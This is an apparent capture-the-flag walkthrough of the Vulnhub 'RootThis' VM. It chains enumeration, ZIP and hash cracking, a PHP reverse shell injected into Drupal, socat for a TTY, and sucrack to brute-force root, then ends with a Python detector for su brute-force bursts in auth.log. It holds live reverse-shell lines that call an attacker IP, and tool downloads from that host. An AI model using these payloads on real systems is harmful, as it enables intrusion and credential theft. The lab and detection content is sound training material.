Vulnhub: RootThis: 1 Walkthrough

bonestherapper
Hello friends! Today we are going to take on another boot2root challenge known as Root This. The credit for making this VM goes to “FredWemeijer”, and our goal is to get root access to complete the challenge. You can download this VM here.

Security Level: Intermediate

Flags: There is one flag (flag.txt).

Penetration Methodology:
  • IP discovery using netdiscover
  • Network scanning (Nmap)
  • Surfing the HTTP service port (80)
  • Directory enumeration using dirb
  • Getting the backup file using wget
  • Cracking the ZIP password using fcrackzip
  • Cracking hashes using John the Ripper
  • Getting a reverse shell
  • Getting a proper TTY shell using socat
  • Cracking the root password using sucrack
  • Retrieving the flag

Walkthrough

Let’s start off with scanning the network to find our target.

Code:
netdiscover

We found our target –> 192.168.1.135

Our next step is to scan our target with nmap.

Code:
nmap -p- -A 192.168.1.135

The Nmap output shows us that only one port is open: 80 (HTTP).

Since port 80 is running HTTP, we open the IP in our browser.

We don’t find anything on the webpage, so we use dirb to enumerate the directories on the web server.

Code:
dirb http://192.168.1.135/

We find two interesting directories called “backup” and “drupal”. We open the “/drupal” directory and find a Drupal CMS login page. We are unable to log in or find any vulnerability in the CMS.

We try to open the “backup/” directory and find that it is a file, so we use “wget” to download it to our system. After downloading it, we find that it is a ZIP file. When we try to extract it, we are prompted for a password. To brute force the password-protected file we can use a tool called “fcrackzip”. After getting the password for the ZIP file, we extract the data and find a SQL file.

Code:
wget http://192.168.1.135/backup
file backup
fcrackzip -D -v -u -p /usr/share/wordlists/rockyou.txt backup
unzip backup
cat dump.sql

Searching through the content of the SQL file, we find two usernames and their password hashes.

We save the hashes in a file and then use John the Ripper to crack them. We successfully crack the hash and get the password for the user “webman”.

Code:
john hashes --wordlist=/usr/share/wordlists/rockyou.txt

We use the credentials “webman:moranguita” to log in to the Drupal CMS, and the login succeeds.

To get a reverse shell on the target system, we go to “Add content” and add the following PHP code, which spawns a reverse shell:

Code:
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.1.107/1234 0>&1'");

We set up our listener, and as soon as we click save on the CMS we get a reverse shell. Enumerating the target system, inside the “/home/user” directory we find a file called “MessageToRoot.txt”. We open the file and find that it hints that the root password is among the first 300 words of rockyou.txt. We try the “su” command and find that we don’t have a proper TTY shell to run it.

We tried multiple ways to get a TTY shell, but are unable to spawn one with any application available on the target machine. So we upload socat to the target machine to get a TTY shell. (Download socat from here)

Code:
wget http://192.168.1.107/socat
./socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.1.107:4567

We start a listener on our local system and get a reverse shell. We run the “su” command and find that we now have a proper TTY shell.

Now we create a dictionary with the first 300 words of rockyou.txt.

Code:
head -n 300 /usr/share/wordlists/rockyou.txt > dict.txt

Now, as there is no SSH running on the target machine, we cannot brute force the username and password over the network. Instead, we can use a tool called “sucrack” that brute forces the password locally through “su”. We download it to our system and extract it. Then we compile the application on our system, as there is no C compiler on the target machine. After compiling the application, we archive the compiled application to upload it to the target machine. (You can find more information about sucrack and download sucrack from here)

Code:
tar -xvf sucrack-1.2.3.tar.gz
cd sucrack-1.2.3/
./configure
make
tar -cvf sucrack.tar sucrack-1.2.3/

We upload the dictionary file and the compiled application to the target system. We first start a Python HTTP server using the “SimpleHTTPServer” module and then use the “wget” command on the target machine to download them from our local system. After downloading both files, we extract the tar file.

Code:
wget http://192.168.1.107/sucrack.tar
tar xvf sucrack.tar

After extracting the tar file, we go to the “sucrack-1.2.3/src” directory, as the compiled binary is inside it, and run the command to brute force the password. The application successfully brute forces the password for the root user. We switch to the root user, and inside the /root directory we successfully get the flag.

Code:
./sucrack -u root -w 10 /tmp/dict.txt
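The detection side of this last step, as an added example that is not part of the original walkthrough: every wrong guess sucrack feeds to “su” is logged by PAM in /var/log/auth.log, and the parallel workers produce a tight burst of failures from one calling user against root. The script below (log lines, hostname and PIDs are constructed for the example) groups su failures per (calling user, target) in a sliding time window and marks the pair as escalated when a root session then opens from the same uid.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed /var/log/auth.log excerpt (syslog format, no year). Lines 1-6 are the shape
# a parallel "su" password guess leaves, line 7 is the success that follows it, and the
# last line is one isolated failure by a normal user that should not be flagged.
SAMPLE_LOG = "\n".join(
    f"Mar 10 12:00:0{i} rootthis su[21{i:02d}]: pam_unix(su:auth): authentication failure; "
    f"logname= uid=33 euid=0 tty=/dev/pts/0 ruser=www-data rhost=  user=root"
    for i in range(6)
) + """
Mar 10 12:00:06 rootthis su[2106]: pam_unix(su:session): session opened for user root by (uid=33)
Mar 10 12:30:00 rootthis su[2300]: pam_unix(su:auth): authentication failure; logname=user uid=1000 euid=0 tty=/dev/pts/1 ruser=user rhost=  user=root"""

TS = r"(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d)"
FAIL_RE = re.compile(TS + r" \S+ su\[\d+\]: pam_unix\(su:auth\): authentication failure;"
                     r".*\buid=(?P<uid>\d+).*\bruser=(?P<src>\S*).*\buser=(?P<target>\S+)$")
OPEN_RE = re.compile(TS + r" \S+ su\[\d+\]: pam_unix\(su:session\): session opened for user "
                     r"(?P<target>\S+) by \(uid=(?P<uid>\d+)\)$")

def detect_su_bruteforce(log_text, threshold=5, window_s=60):
    """Return {(src, target): {"failures", "uid", "escalated"}} for pairs with at least
    `threshold` su failures inside `window_s` seconds; "escalated" is set when a later
    su session for the same target is opened by the same uid that was guessing."""
    recent = defaultdict(deque)   # (src, target) -> timestamps of failures still in window
    alerts = {}
    for line in log_text.splitlines():
        m = FAIL_RE.match(line)
        if m:
            key = (m["src"], m["target"])
            t = datetime.strptime(m["ts"], "%b %d %H:%M:%S")
            q = recent[key]
            q.append(t)
            while (t - q[0]).total_seconds() > window_s:   # drop failures outside window
                q.popleft()
            if len(q) >= threshold:
                a = alerts.setdefault(key, {"failures": 0, "uid": m["uid"], "escalated": False})
                a["failures"] = max(a["failures"], len(q))
            continue
        m = OPEN_RE.match(line)
        if m:   # a successful su after a burst from the same uid means the guess worked
            for (src, target), a in alerts.items():
                if target == m["target"] and a["uid"] == m["uid"]:
                    a["escalated"] = True
    return alerts

if __name__ == "__main__":
    for (src, target), a in detect_su_bruteforce(SAMPLE_LOG).items():
        print(f"{src} -> {target}: {a['failures']} failures in window, escalated={a['escalated']}")
```

On a real host the same burst is also visible as `FAILED su for root by <user>` lines, and a single `pam_faildelay`/`pam_tally2`-style lockout on su is the mitigation that makes `-w 10` style parallel guessing impractical.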

Author: Sushma Ahuja is a Technical Writer, Researcher, and Penetration Tester. She can be contacted on LinkedIn.